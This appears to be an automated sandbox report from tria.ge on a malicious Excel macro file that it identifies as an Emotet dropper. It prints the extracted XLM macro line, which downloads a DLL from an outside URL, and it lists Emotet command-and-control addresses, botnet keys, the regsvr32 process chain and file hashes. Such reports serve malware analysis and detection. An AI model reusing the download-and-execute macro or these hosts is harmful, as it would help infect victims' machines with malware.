Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    153s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    03/05/2022, 11:55 UTC

General

  • Target

    ?i=1hefannde.xlsm

  • Size

    50KB

  • MD5

    793c5a832ea9b3c4a225bc96b4449bc2

  • SHA1

    168afc78144b659b18b606a26c3e9a6343dd104a

  • SHA256

    894658b992050ab6d7ee061f083a48264ce56c1b4fbc5ac87c142765405a47f7

  • SHA512

    df041addb6c8113b2add5439f8ce258016233a47a13a3d540187872e4ac25fe3ac87b016bb391a703e0cb73189f1720c0e723b6df47ef971238312ed77a9b607

Malware Config

Extracted

Language
xlm4.0
Source
1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/", "..\rulm.dll")
URLs
xlm40.dropper

http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/

Extracted

Family

emotet

Botnet

Epoch4

C2

68.183.94.239:80

104.131.11.205:443

138.197.109.175:8080

187.84.80.182:443

79.143.187.147:443

216.158.226.206:443

167.99.115.35:8080

212.24.98.99:8080

1.234.21.73:7080

206.189.28.199:8080

158.69.222.101:443

164.68.99.3:8080

188.44.20.25:443

185.157.82.211:8080

134.122.66.193:8080

196.218.30.83:443

72.15.201.15:8080

5.9.116.246:8080

176.104.106.96:8080

153.126.146.25:7080

eck1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuw
3
TyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuqzx+58sdg==
4
-----END PUBLIC KEY-----
ecs1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9Xoov
3
pqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSPBghxjZdDxY+Q==
4
-----END PUBLIC KEY-----

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\_i=1hefannde.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3996
    • C:\Windows\SysWow64\regsvr32.exe
      C:\Windows\SysWow64\regsvr32.exe -s ..\rulm.dll
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      PID:2480
      • C:\Windows\SysWOW64\regsvr32.exe
        C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Jfjnwdsahcjjsv\bqck.lde"
        3⤵
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:3852

Network

  • flag-us
    DNS
    harleyqueretaro.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    harleyqueretaro.com
    IN A
    Response
    harleyqueretaro.com
    IN A
    63.247.138.144
  • flag-us
    GET
    http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/
    EXCEL.EXE
    Remote address:
    63.247.138.144:80
    Request
    GET /renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: harleyqueretaro.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Tue, 03 May 2022 12:01:23 GMT
    Server: Apache
    X-Powered-By: PHP/5.6.40
    Set-Cookie: 6271199321c21=1651579283; expires=Tue, 03-May-2022 12:02:23 GMT; Max-Age=60; path=/
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Last-Modified: Tue, 03 May 2022 12:01:23 GMT
    Expires: Tue, 03 May 2022 12:01:23 GMT
    Content-Disposition: attachment; filename="illkVUA0aCB42y28qRyvY91Mq6.dll"
    Content-Transfer-Encoding: binary
    Content-Length: 868352
    Connection: close
    Content-Type: application/x-msdownload
  • 8.238.21.126:80
    322 B
    7
  • 93.184.220.29:80
    322 B
    7
  • 52.178.17.2:443
    322 B
    7
  • 104.110.191.140:80
    322 B
    7
  • 104.110.191.140:80
    322 B
    7
  • 104.110.191.140:80
    322 B
    7
  • 63.247.138.144:80
    http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/
    http
    EXCEL.EXE
    30.1kB
    894.6kB
    646
    642

    HTTP Request

    GET http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/

    HTTP Response

    200
  • 8.8.8.8:53
    harleyqueretaro.com
    dns
    EXCEL.EXE
    65 B
    81 B
    1
    1

    DNS Request

    harleyqueretaro.com

    DNS Response

    63.247.138.144

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\rulm.dll

    Filesize

    848KB

    MD5

    26bf9a27e1ae4680db6c0528579aa5d5

    SHA1

    1c606018e5dc1bd2189b88216ea82c59f72449e9

    SHA256

    7a2b948dfa606620068203247663247cb95c4a64fde2fa6e522a0a2828027352

    SHA512

    d91d47ac63a24fed894e460e4d03fe2f23636d0f1a561f267007e0d1910424f437a3c8a38100c6b81c2824c50a76cc3c777158023608643f83c29545fcf6b2fb

  • C:\Users\Admin\rulm.dll

    Filesize

    848KB

    MD5

    26bf9a27e1ae4680db6c0528579aa5d5

    SHA1

    1c606018e5dc1bd2189b88216ea82c59f72449e9

    SHA256

    7a2b948dfa606620068203247663247cb95c4a64fde2fa6e522a0a2828027352

    SHA512

    d91d47ac63a24fed894e460e4d03fe2f23636d0f1a561f267007e0d1910424f437a3c8a38100c6b81c2824c50a76cc3c777158023608643f83c29545fcf6b2fb

  • C:\Windows\SysWOW64\Jfjnwdsahcjjsv\bqck.lde

    Filesize

    848KB

    MD5

    26bf9a27e1ae4680db6c0528579aa5d5

    SHA1

    1c606018e5dc1bd2189b88216ea82c59f72449e9

    SHA256

    7a2b948dfa606620068203247663247cb95c4a64fde2fa6e522a0a2828027352

    SHA512

    d91d47ac63a24fed894e460e4d03fe2f23636d0f1a561f267007e0d1910424f437a3c8a38100c6b81c2824c50a76cc3c777158023608643f83c29545fcf6b2fb

  • memory/2480-140-0x0000000002401000-0x0000000002421000-memory.dmp

    Filesize

    128KB

  • memory/2480-141-0x0000000002400000-0x0000000002424000-memory.dmp

    Filesize

    144KB

  • memory/3852-145-0x0000000002EF0000-0x0000000002F14000-memory.dmp

    Filesize

    144KB

  • memory/3996-133-0x00007FFC95270000-0x00007FFC95280000-memory.dmp

    Filesize

    64KB

  • memory/3996-136-0x00007FFC93100000-0x00007FFC93110000-memory.dmp

    Filesize

    64KB

  • memory/3996-135-0x00007FFC93100000-0x00007FFC93110000-memory.dmp

    Filesize

    64KB

  • memory/3996-134-0x00007FFC95270000-0x00007FFC95280000-memory.dmp

    Filesize

    64KB

  • memory/3996-130-0x00007FFC95270000-0x00007FFC95280000-memory.dmp

    Filesize

    64KB

  • memory/3996-132-0x00007FFC95270000-0x00007FFC95280000-memory.dmp

    Filesize

    64KB

  • memory/3996-131-0x00007FFC95270000-0x00007FFC95280000-memory.dmp

    Filesize

    64KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.